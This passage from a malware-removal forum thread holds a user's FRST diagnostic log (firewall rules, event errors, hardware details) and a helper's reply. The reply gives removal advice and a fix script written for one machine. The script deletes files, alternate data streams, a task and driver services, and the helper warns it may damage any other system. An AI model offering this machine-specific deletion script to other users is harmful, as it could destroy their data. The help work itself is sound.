FirewallRules: [TCP Query User{E45A8FBA-CC96-4DBD-907C-CD0FFA1E1E2F}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [UDP Query User{71A2705A-4191-47D8-940A-1166319F2FA9}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [TCP Query User{1B3540C0-880A-4830-8EA9-F4E767B15295}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [UDP Query User{7DC1365C-3980-42E2-8358-9FBD287115ED}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [{03ECDC1B-87E1-4ADD-8478-838BEA1ADAC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{82B24CAA-22CD-474F-9603-C584E23551C7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{C104DE8D-F4CA-4B1B-8E31-EEEAA8A34C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{60FD9D66-A167-4E88-B93E-C8E846A175B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{3F69A2ED-5DE2-4023-878A-981FC71D1A1A}] => (Allow) C:\Users\Miggy\AppData\Local\Programs\Opera GX\82.0.4227.50\opera.exe => No File
FirewallRules: [{C144C0C8-2B57-421B-86BB-1A7E3AD62915}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe => No File
FirewallRules: [{1F4F8DFE-0CAB-47F0-9183-053E15271167}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe => No File
FirewallRules: [{81992F8E-512D-4DA7-9DAC-488D45E25D38}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [{8FA454E8-45DF-4A08-8AAA-22B1A63B59A4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [TCP Query User{14653097-6416-4742-9C82-CB6934D75E94}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [UDP Query User{080D84FE-1FEF-4314-AA75-DCB6FD8301F6}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [TCP Query User{25147A68-BF60-45EC-9583-E036CA89AAF4}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{5303B7F7-593C-4FE0-8D06-028805E1A292}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{D9362094-CBEE-45FF-A39E-07BABE2891C8}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{3E2E905F-A92A-4FD0-9610-1E3EA900E7D3}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [TCP Query User{00C1C5F8-22B4-4750-895A-C3290EB3F317}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [UDP Query User{47B0D35C-8AE4-4385-BD07-21CBBFD2FC47}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [{3B141ECB-9639-4E7F-8F76-780368F6DDFF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{34756878-EE88-4AE5-B99F-C95EF86641C8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{8F876A7A-5287-4288-BD35-11D979C8802A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{7763C119-63E6-404D-9836-BD172EBE332B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{04B67B1C-2819-4DBC-A81D-6C6C9EDBB6F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{E13084FB-B670-4131-A5A7-F7DB8373FFCF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8D2CD827-1C1D-4DA6-B7B5-8D580DE48C58}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{0104ADC6-9CAF-4DCA-BE6B-0DA2840D2800}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [TCP Query User{BEBAB357-E674-4617-BD1A-F6AB3FCDB7D2}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{925781FD-FCC4-432F-8C07-D07A1C5EAFC7}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [{637A7132-8D14-42F8-920B-B680BCA48683}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{F64D2521-B66A-4829-8FBE-C10617C50F8D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{B59E8386-4265-4E90-BAF8-CAD8DECCE6D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{FCF2F178-BD0F-47A7-8F44-E9DCD60B4DC1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{3835BCC7-FABB-4D0F-81A0-DD004D72FD79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [{6E906B8E-DECB-426F-98F9-98530E0E9838}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [TCP Query User{EA2280C2-20B0-42F1-8974-CA8D4D530938}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [UDP Query User{E5CC6F2D-4A52-4C56-A097-FEA84E711E27}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [{0BA33FB8-0DDA-473D-9A0F-69C2664D21D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{6217A59E-EBE3-4859-9E09-13C70D22D77C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{93C48266-F67B-414C-8798-072A31D4A908}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{573A6C3A-5FD0-496E-B86A-01C574A076AE}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [TCP Query User{0D3DB0DC-AC15-4DCC-AE15-C16DF0FA0FF8}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{34131973-3A86-4AA5-A1E3-43D38FAFCBAB}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{10B7ADFC-36E5-4136-8904-4BB2274FE63C}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [UDP Query User{47D1A8F9-9D77-4C46-99BE-D8821B3F3E1D}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [{FEF65CC4-341A-4FD2-A824-A6D329480713}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{6749EDCE-B127-4A53-A5AF-90CE152BAD78}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{171A237C-E9C7-4615-8B1E-5C9C788979AD}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D6F304CE-E1E7-4468-A75D-139D43303668}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{AD0903A5-230D-40EC-9560-A4EDEA0FC48D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BAC90EB2-EF43-4263-B3F9-FC92B93BF152}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{61834926-009D-423A-BDD2-E8081CBEB7D5}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [UDP Query User{13EE0F33-1B8A-4274-9855-871FD73A4497}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [{8C3803A5-EA5C-4889-9857-9FDB4DA23242}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{01E21564-B49B-48F9-8E36-D8CF45BEEEDC}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [UDP Query User{0F00EB50-6FA3-4928-9F2C-945043197824}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [{6486CC56-8E36-4F5B-84C6-D5DFA851ACB3}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\103.0.1264.49\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6F92321E-DF3A-45A7-A575-6A779E9B8D46}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{8BF615D7-A12A-483A-A40A-BFE9D6F2C0A6}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{753ADBE4-FB37-42A8-8798-757F858B08C2}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{A6F6C4AB-87DA-4C6B-ADED-12C8F7909461}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{6717B840-E914-4EFE-BE62-1FB363E7F09A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{61A809E9-FEB5-46ED-8906-BDFAA3FF8A94}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{93A10216-66C0-42BF-ABC4-0342110C8055}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{52240A98-1551-4AB2-B3A2-64624335D754}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{CAAC3CD2-7CDF-4592-BFFE-01EEEA05AF16}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{E1C306E0-1DDD-47AA-BB45-826B3153976D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
==================== Restore Points =========================
10-07-2022 16:42:28 Installed DirectX
13-07-2022 18:22:15 Removed Dual-Core Optimizer.
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (07/16/2022 12:10:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1900
Faulting application start time: 0x01d8994707d5ecc9
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 36d0ee37-f58a-43d9-be8b-9c2b8115e329
Faulting package full name:
Faulting package-relative application ID:
Error: (07/15/2022 11:05:01 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 103.0.5060.114 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 63d0
Start Time: 01d898d58448bb99
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Report Id: dffcbb73-8528-4d0c-8ea2-70a8d5a2c018
Faulting package full name:
Faulting package-relative application ID:
Hang type: Top level window is idle
Error: (07/15/2022 07:09:09 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: The storage optimizer couldn't complete retrim on \\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ because: The operation requested is not supported by the hardware backing the volume. (0x8900002A)
Error: (07/15/2022 07:03:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x3b84
Faulting application start time: 0x01d898b787859d26
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: b97d719a-87ab-4cea-b3b9-e6f2b32fa6c1
Faulting package full name:
Faulting package-relative application ID:
Error: (07/15/2022 06:35:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x14d54
Faulting application start time: 0x01d898b3a05eeb43
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 71427424-3c9f-4244-8dfc-4bb4775f7720
Faulting package full name:
Faulting package-relative application ID:
Error: (07/14/2022 11:14:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x4b54
Faulting application start time: 0x01d898116a40ca06
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 115e5758-376d-43b8-bb14-610180db1fcd
Faulting package full name:
Faulting package-relative application ID:
Error: (07/14/2022 03:53:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BatmanAC.exe, version: 1.1.0.0, time stamp: 0x520000f7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000001
Faulting process id: 0x5a34
Faulting application start time: 0x01d897cab8eff5b5
Faulting application path: C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
Faulting module path: unknown
Report Id: f43d4c35-394f-4595-a573-547c1cd90170
Faulting package full name:
Faulting package-relative application ID:
Error: (07/14/2022 11:42:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1904
Faulting application start time: 0x01d897b0d663f446
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 8df2ef94-e121-4e25-b9da-0d4cbd2ae1b7
Faulting package full name:
Faulting package-relative application ID:
System errors:
=============
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 11:55:42 PM) (Source: DCOM) (EventID: 10005) (User: MIGGYPC)
Description: DCOM got error "1053" attempting to start the service BcastDVRUserService_ae76358 with arguments "Unavailable" in order to run the server:
Windows.Media.Capture.Internal.AppCaptureShell
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The GameDVR and Broadcast User Service_ae76358 service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the GameDVR and Broadcast User Service_ae76358 service to connect.
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
Windows Defender:
================
Date: 2022-07-15 19:09:08
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-14 11:53:58
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-11 19:01:40
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-10 18:38:28
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-07 18:00:59
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
==================== Memory info ===========================
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor
Percentage of memory in use: 91%
Total physical RAM: 8139.07 MB
Available physical RAM: 705 MB
Total Virtual: 20939.07 MB
Available Virtual: 3027.04 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:475.83 GB) (Free:128.27 GB) (Model: TEAM T253X2512G) NTFS
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
Partition: GPT.
Attempted reading MBR returned 0 bytes.
Could not read MBR for disk 1.
==================== End of Addition.txt =======================
#6
axe0
-
- Malware Response Team
- 2,059 posts
- OFFLINE
- Gender:Male
- Location:Netherlands
- Local time:03:17 AM
Posted 17 July 2022 - 09:34 AM
Hi miggybruh,
Thanks for your patience.
Have you set policies for Windows Update?
I noticed qBittorrent is installed.
- Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
- They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
- Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
- The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
It is pretty much certain that if you continue to use P2P programs, you will get infected. It is the source of the malware currently present on your computer.
I would recommend that you uninstall qBittorrent, however that choice is up to you. If you choose to remove this program, you can do so via Start > Control Panel > Add/Remove Programs.
----------------------------------------------
Uninstall Programs
The below listed programs have been identified as a Potential Unwanted Program, please uninstall them to ensure a better clean-up.
- Press the Windows Key + R.
- Type appwiz.cpl in the Run box and click OK.
- A list of programs installed will be "populated" (this may take a bit of time).
- If they exist, uninstall the following by clicking on the below entries and selecting "Remove":
- RestMinder
If you notice issues with uninstalling a program, please let me know.
----------------------------------------------
Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system
Warning: After running this script you will have to login again to any website like banking websites.
- Right-click FRST64.exe then click "Run as administrator".
- Select the entire content of the code below including "Start::" and "End::", right click and select "Copy"
- Click Fix button once and wait
- When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.
- Please copy and paste the log in your next reply.
Start::
CreateRestorePoint:
CloseProcesses:
emptytemp:
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
C:\ProgramData\DisplaySessionContainer*.log
C:\ProgramData\DisplaySessionContainer*.log_backup1
C:\Users\Miggy\AppData\Local\Programs\RestMinder
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
C:\users\miggy\appdata\roaming\energy
C:\users\miggy\appdata\roaming\bloom
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
Folder: C:\Users\Miggy\AppData\Local\Enverr
Folder: C:\Users\Miggy\AppData\LocalLow\Rayll
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
